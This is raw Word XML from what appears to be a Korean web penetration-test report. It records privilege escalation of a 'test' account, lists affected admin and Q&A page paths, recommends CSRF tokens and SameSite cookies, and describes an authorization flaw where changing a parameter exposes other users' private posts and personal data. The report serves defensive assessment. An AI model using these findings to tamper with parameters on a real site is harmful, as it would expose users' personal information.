      <w:r w:rsidR="008E32C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180D9B9B" wp14:editId="5CD722B2">
            <wp:extent cx="4572000" cy="1945683"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="16510"/>
            <wp:docPr id="1951474671" name="그림 195147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41" b="62790"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="19456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BCCF4" w14:textId="5991C057" w:rsidR="00F92932" w:rsidRDefault="008E32C2" w:rsidP="008E32C2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="414" w:name="_Toc20909462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51</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계정 권한 상승 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="414"/>
    </w:p>
    <w:p w14:paraId="409E0413" w14:textId="77777777" w:rsidR="00F92932" w:rsidRDefault="00F92932" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42712177" w14:textId="77777777" w:rsidR="00166D19" w:rsidRPr="00CB22A6" w:rsidRDefault="00166D19" w:rsidP="00166D19">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166D19" w:rsidRPr="00B112DB" w14:paraId="6F8F195A" w14:textId="77777777" w:rsidTr="005E1156">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="091DA6AE"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51900986"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DCA28E2"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5D1FF3" w:rsidRPr="00B112DB" w14:paraId="7E56A04E"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FCC74D3" w14:textId="6B260A22" w:rsidR="005D1FF3" w:rsidRPr="00CB22A6" w:rsidRDefault="005D1FF3" w:rsidP="005D1FF3">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AA87B" w14:textId="4803FF44" w:rsidR="005D1FF3" w:rsidRPr="00CB22A6" w:rsidRDefault="005D1FF3" w:rsidP="005D1FF3">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관리자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B0E4AC1" w14:textId="7D86367B" w:rsidR="005D1FF3" w:rsidRPr="00CB22A6"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/member_admin.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D1FF3" w:rsidRPr="00B112DB" w14:paraId="5710C943"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C50DA81" w14:textId="2B92D3B9" w:rsidR="005D1FF3" w:rsidRPr="00CB22A6" w:rsidRDefault="005D1FF3" w:rsidP="005D1FF3">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DB5E9B" w14:textId="04F7EF34" w:rsidR="005D1FF3" w:rsidRDefault="005D1FF3" w:rsidP="005D1FF3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>메인 페이지 &gt; 고객센터 페이지 &gt;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EC92EB0" w14:textId="20E512BC" w:rsidR="005D1FF3" w:rsidRPr="00987A57"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/qna/openQnaList.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D1FF3" w:rsidRPr="00B112DB" w14:paraId="40F78AA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644B9CC" w14:textId="738ED087" w:rsidR="005D1FF3" w:rsidRPr="00CB22A6" w:rsidRDefault="005D1FF3" w:rsidP="005D1FF3">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987A97" w14:textId="48E2BD29" w:rsidR="005D1FF3" w:rsidRDefault="005D1FF3" w:rsidP="005D1FF3">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>메인 페이지</w:t>
            </w:r>
            <w:r w:rsidRPr="00585C3A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; 고객센터 페이지 &gt; QNA </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00F96EBE">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>QNA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>글 작성</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5A39E2B" w14:textId="0F0C6821" w:rsidR="005D1FF3" w:rsidRPr="00F96EBE"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/qna/openQnaWrite.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A05F970" w14:textId="77777777" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123F1F52" w14:textId="77777777" w:rsidR="00166D19" w:rsidRPr="00CB22A6" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA15A44" w14:textId="0447BF3A" w:rsidR="00166D19" w:rsidRDefault="00EE5FE6" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5FE6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>요청</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5FE6">
        <w:t xml:space="preserve"> 위변조 방지를 위해 모든 상태 변경 요청에 대해 CSRF 토큰을 검증하는 기능을 적용해야 합니다. CSRF 토큰은 세션별로 난수 기반으로 생성·부여하여 요청 시 검증되도록 해야 하며, Referer 검증이나 SameSite 쿠키 옵션 적용 등 추가적인 보안 설정을 병행하여 다계층적인 대응이 이루어지도록 하는 것이 필요합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEEE835" w14:textId="142D934D" w:rsidR="003667A4" w:rsidRDefault="003667A4" w:rsidP="003667A4">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="415" w:name="_Toc209094564"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>불충분한 인가</w:t>
      </w:r>
      <w:bookmarkEnd w:id="415"/>
    </w:p>
    <w:p w14:paraId="044F2AA0" w14:textId="77777777" w:rsidR="003667A4" w:rsidRDefault="003667A4" w:rsidP="003667A4">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C22E8C8" w14:textId="0A8744CD" w:rsidR="003667A4" w:rsidRDefault="0074576D" w:rsidP="0074576D">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>접근제어가</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 필요한 중요 페이지의 통제</w:t>
      </w:r>
      <w:r w:rsidR="006139DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">수단이 미흡한 경우, 비인가자가 URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파라미터</w:t>
      </w:r>
      <w:r>
        <w:t>값 변경 등의 방법으로 중요 페이지에 접근</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 수 있는 취약점</w:t>
      </w:r>
      <w:r w:rsidR="00D23D53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입니</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이를 통하여 공격자는</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 민감한 정보 열람 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>및</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009221D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>변조할 수 있습니다</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이는 엔드포인트 권한 체크 로직이 존재하지 않거나 클라이언트 측 검증에 의존 등의 이유로 발견될 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15816980" w14:textId="77777777" w:rsidR="00115793" w:rsidRDefault="00115793" w:rsidP="003667A4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12492464" w14:textId="77777777" w:rsidR="003667A4" w:rsidRPr="00CB22A6" w:rsidRDefault="003667A4" w:rsidP="003667A4">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B352CB" w14:textId="6D3DCD46" w:rsidR="00604E1C" w:rsidRDefault="002779C1" w:rsidP="00604E1C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002779C1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게시글을</w:t>
      </w:r>
      <w:r w:rsidRPr="002779C1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 구분하는 파라미터 값을 변경하는 것만으로 다른 사용자의 비밀 게시글 (또는 개인정보 변경, 패스워드 변경 등)에 접근</w:t>
      </w:r>
      <w:r w:rsidR="006B7A35">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 수 있는</w:t>
      </w:r>
      <w:r w:rsidRPr="002779C1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점이 발견되었습니다. 이는 파라미터만 조작하면 다른 사용자의 이름, 전화번호, 이메일, 주소 등 개인정보가 노출될 위험이 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2A5BCC" w14:textId="77777777" w:rsidR="00604E1C" w:rsidRDefault="00604E1C" w:rsidP="00604E1C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CC06BB" w14:textId="16D3715D" w:rsidR="00604E1C" w:rsidRPr="00604E1C" w:rsidRDefault="00871DE0" w:rsidP="00604E1C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48B0C58A" wp14:editId="445AE9A5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4607560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>615950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="346191" cy="242455"/>
                <wp:effectExtent l="0" t="0" r="15875" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="960" name="직사각형 960"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="346191" cy="2424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DC66" id="직사각형 960" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:362.8pt;margin-top:48.5pt;width:27.25pt;height:19.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hVfgIAAM4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdJOQlGbVTRW1CkKq&#10;2kgt6nnitbOW/IftZFNu5R2QeAMuHHguVN6BsXfTlsIJkYMz4/n//M0en+y0Ilvug7SmosODASXc&#10;MFtLs67o++vFqyNKQgRTg7KGV/SWB3oye/niuHUlH9nGqpp7gklMKFtX0SZGVxZFYA3XEA6s4waN&#10;wnoNEVW/LmoPLWbXqhgNBodFa33tvGU8BLw964x0lvMLwVm8FCLwSFRFsbeYT5/PVTqL2TGUaw+u&#10;kaxvA/6hCw3SYNGHVGcQgWy8/COVlszbYEU8YFYXVgjJeJ4BpxkOnk1z1YDjeRYEJ7gHmML/S8su&#10;tktPZF3R6SHiY0DjI91/vbv/9O3H97ufXz6TdI8otS6U6Hzllr7XAopp5J3wOv3jMGSXkb19QJbv&#10;ImF4+Xp8OJwOKWFoGo1H48kk5Sweg50P8S23miShoh4fLuMJ2/MQO9e9S6pl7EIqhfdQKkNaZN50&#10;MMH+GSCHhIKIonY4VTBrSkCtkZws+pwyWCXrFJ6ig1+vTpUnW0CCLBYD/PWd/eaWap9BaDq/bEpu&#10;UGoZkb9K6ooepeB9tDLJyjMD+wkSgh1mSVrZ+haR97ajZHBsIbHIOYS4BI8cxGlwr+IlHkJZHNH2&#10;EiWN9R//dp/8kRpopaRFTuP4HzbgOSXqnUHSTIfjcVqCrIwnb0ao+KeW1VOL2ehTi6jgs2F3WUz+&#10;Ue1F4a2+wfWbp6poAsOwdgd0r5zGbtdwgRmfz7MbEt9BPDdXjqXkCacE7/XuBrzr3z8icS7snv9Q&#10;PqNB55sijZ1vohUyc+QRV+RWUnBpMsv6BU9b+VTPXo+fodkvAAAA//8DAFBLAwQUAAYACAAAACEA&#10;SjqNv98AAAAKAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KhTo9ZpiFMBEkIg&#10;DlDo3Y3dJKq9jmI3CX/PcoLjap9m3pTb2Ts22iF2ARUsFxkwi3UwHTYKvj6fbnJgMWk02gW0Cr5t&#10;hG11eVHqwoQJP+y4Sw2jEIyFVtCm1Becx7q1XsdF6C3S7xgGrxOdQ8PNoCcK946LLFtzrzukhlb3&#10;9rG19Wl39grew+nI3V6IV/nwLOSLz6dmfFPq+mq+vwOW7Jz+YPjVJ3WoyOkQzmgicwqkWK0JVbCR&#10;tIkAmWdLYAcib1cCeFXy/xOqHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC7QchVfgIA&#10;AM4EAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBKOo2/&#10;3wAAAAoBAAAPAAAAAAAAAAAAAAAAANgEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;5AUAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00604E1C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5011B2E8" wp14:editId="6EC236C1">
            <wp:extent cx="4572000" cy="1810667"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="18415"/>
            <wp:docPr id="1951474687" name="그림 195147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04" b="30930"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1810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BB623" w14:textId="7BC6E214" w:rsidR="00D17B59" w:rsidRDefault="00604E1C" w:rsidP="00D17B59">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="416" w:name="_Toc20909462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52</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>고객센터</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="416"/>
    </w:p>
    <w:p w14:paraId="252C74D2" w14:textId="77777777" w:rsidR="00D17B59" w:rsidRDefault="00D17B59" w:rsidP="00D17B59">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BF3775" w14:textId="6558F0E1" w:rsidR="00D17B59" w:rsidRDefault="0027102E" w:rsidP="00D17B59">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EF42257" wp14:editId="2BBB85D2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4585335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>118745</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="346191" cy="242455"/>
                <wp:effectExtent l="0" t="0" r="15875" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="962" name="직사각형 962"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="346191" cy="2424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4A8D" id="직사각형 962" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:361.05pt;margin-top:9.35pt;width:27.25pt;height:19.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R5fgIAAM4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdJOQlGbVTRW1CkKq&#10;2kgt6nnitbOW/IftZFNu5R2QeAMuHHguVN6BsXfTlsIJkYMz4/n//M0en+y0Ilvug7SmosODASXc&#10;MFtLs67o++vFqyNKQgRTg7KGV/SWB3oye/niuHUlH9nGqpp7gklMKFtX0SZGVxZFYA3XEA6s4waN&#10;wnoNEVW/LmoPLWbXqhgNBodFa33tvGU8BLw964x0lvMLwVm8FCLwSFRFsbeYT5/PVTqL2TGUaw+u&#10;kaxvA/6hCw3SYNGHVGcQgWy8/COVlszbYEU8YFYXVgjJeJ4BpxkOnk1z1YDjeRYEJ7gHmML/S8su&#10;tktPZF3R6eGIEgMaH+n+6939p28/vt/9/PKZpHtEqXWhROcrt/S9FlBMI++E1+kfhyG7jOztA7J8&#10;FwnDy9fjw+F0SAlD02g8Gk8mKWfxGOx8iG+51SQJFfX4cBlP2J6H2LnuXVItYxdSKbyHUhnSIvOm&#10;gwm+LwPkkFAQUdQOpwpmTQmoNZKTRZ9TBqtkncJTdPDr1anyZAtIkMVigL++s9/cUu0zCE3nl03J&#10;DUotI/JXSV3RoxS8j1YmWXlmYD9BQrDDLEkrW98i8t52lAyOLSQWOYcQl+CRgzgN7lW8xEMoiyPa&#10;XqKksf7j3+6TP1IDrZS0yGkc/8MGPKdEvTNImulwPE5LkJXx5M0IFf/UsnpqMRt9ahEVfDbsLovJ&#10;P6q9KLzVN7h+81QVTWAY1u6A7pXT2O0aLjDj83l2Q+I7iOfmyrGUPOGU4L3e3YB3/ftHJM6F3fMf&#10;ymc06HxTpLHzTbRCZo484orcSgouTWZZv+BpK5/q2evxMzT7BQAA//8DAFBLAwQUAAYACAAAACEA&#10;ZePO694AAAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzVI7KhTS8QhxKkACSEQ&#10;Cyjt3o2nSVQ/othNwt8zrGA5ukf3nqk2i7NswjH2wStYrzJg6Jtget8q2H093xTAYtLeaBs8KvjG&#10;CJv68qLSpQmz/8Rpm1pGJT6WWkGX0lByHpsOnY6rMKCn7BhGpxOdY8vNqGcqd5aLLMu5072nhU4P&#10;+NRhc9qenYKPcDpyuxfiTT6+CPnqirmd3pW6vloe7oElXNIfDL/6pA41OR3C2ZvIrAIpxJpQCgoJ&#10;jAAp8xzYQcFtfge8rvj/D+ofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAYhRHl+AgAA&#10;zgQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAGXjzuve&#10;AAAACQEAAA8AAAAAAAAAAAAAAAAA2AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADj&#10;BQAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D17B59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E5EFF8F" wp14:editId="54099EEE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1673860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1993265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="602673" cy="248285"/>
                <wp:effectExtent l="0" t="0" r="26035" b="18415"/>
                <wp:wrapNone/>
                <wp:docPr id="963" name="직사각형 963"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="602673" cy="24828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0957E" id="직사각형 963" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:131.8pt;margin-top:156.95pt;width:47.45pt;height:19.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mfwIAAM4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDchTdNVNlXUKgip&#10;aiu1qOeJ15u15D9sJ5tyK++A1DfgwoHnQuUdGHs3bSicEDk48z+ez9/s9GSrJNlw54XRJR0c5JRw&#10;zUwl9KqkH24WbyaU+AC6Amk0L+kd9/Rk9vrVtLUFH5rGyIo7gkW0L1pb0iYEW2SZZw1X4A+M5Rqd&#10;tXEKAqpulVUOWqyuZDbM83HWGldZZxj3Hq1nnZPOUv265ixc1rXngciS4t1COl06l/HMZlMoVg5s&#10;I1h/DfiHWygQGps+lTqDAGTtxB+llGDOeFOHA2ZUZupaMJ5mwGkG+YtprhuwPM2C4Hj7BJP/f2XZ&#10;xebKEVGV9Hj8lhINCh/p8ev94+dvP77f/3z4QqIdUWqtLzD42l65XvMoxpG3tVPxH4ch24Ts3ROy&#10;fBsIQ+M4H46PsD5D13A0GU4OY83sOdk6H95xo0gUSurw4RKesDn3oQvdhcRe2iyElGiHQmrSIvOO&#10;80N8XwbIoVpCQFFZnMrrFSUgV0hOFlwq6Y0UVUyP2d6tlqfSkQ0gQRaLHH/9zX4Li73PwDddXHLF&#10;MCiUCMhfKVRJJzF5ly119PLEwH6CiGCHWZSWprpD5J3pKOktWwhscg4+XIFDDuI0uFfhEo9aGhzR&#10;9BIljXGf/maP8UgN9FLSIqdx/I9rcJwS+V4jaY4Ho1FcgqSMDo+GqLh9z3Lfo9fq1CAqA9xgy5IY&#10;44PcibUz6hbXbx67ogs0w94d0L1yGrpdwwVmfD5PYUh8C+FcX1sWi0ecIrw321twtn//gMS5MDv+&#10;Q/GCBl1szNRmvg6mFokjz7git6KCS5NY1i943Mp9PUU9f4ZmvwAAAP//AwBQSwMEFAAGAAgAAAAh&#10;AG0PUvngAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG4sXap1pTSd2CSE&#10;QBxgwD1rvLZa4lRN1pa3JzvBzZY//f7+cjNbw0YcfOdIwnKRAEOqne6okfD1+XSXA/NBkVbGEUr4&#10;QQ+b6vqqVIV2E33guA8NiyHkCyWhDaEvOPd1i1b5heuR4u3oBqtCXIeG60FNMdwaLpIk41Z1FD+0&#10;qsddi/Vpf7YS3t3pyM23EK/r7bNYv9h8asY3KW9v5scHYAHn8AfDRT+qQxWdDu5M2jMjQWRpFlEJ&#10;6TK9BxaJdJWvgB0uQ5oAr0r+v0P1CwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEj90aZ/&#